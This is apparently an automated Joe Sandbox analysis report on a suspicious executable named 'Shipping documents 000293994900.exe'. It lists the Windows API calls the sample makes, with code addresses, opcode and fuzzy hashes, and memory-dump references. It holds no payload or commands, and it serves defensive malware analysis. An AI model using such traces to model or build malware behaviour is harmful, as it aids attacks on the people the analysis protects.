                                                • Instruction ID: fe6b2c3b67c783468e3d99353c909943c883638b9352ade8fce09ac857d2aff0
                                                • Opcode Fuzzy Hash: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
                                                • Instruction Fuzzy Hash: EEF0F925305E5359D62133365C85EAF1554CF96364719073BB861B11D1CB3C8943CDBD
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                                                • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                                                • Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                                                • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405B58
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                                                • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                • Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
                                                • Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                • Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E
                                                APIs
                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
                                                • Instruction ID: d23dd041866cef5afdca28ea12ef8b7a62ea4ba21799db9ef353d819d1220e11
                                                • Opcode Fuzzy Hash: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
                                                • Instruction Fuzzy Hash: 55E048B1314100AAD710DF65DD48EAA7768DB01368F304576F211B61D1D2B469419729
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
                                                • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
                                                APIs
                                                • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                                • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString
                                                • String ID:
                                                • API String ID: 1096422788-0
                                                • Opcode ID: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
                                                • Instruction ID: 6bbe31101158ed697117799215e52ff0bd2f9d85eb69b818a49c661f2cf41376
                                                • Opcode Fuzzy Hash: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
                                                • Instruction Fuzzy Hash: BCE08630841204BBDB00AFA0CD49DEE3B78EF11340F10443AF540BB0D1E7F89580975A
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                                                • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                                                • Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
                                                • Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                                                • Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                • DeleteObject.GDI32(00000000), ref: 00404C04
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
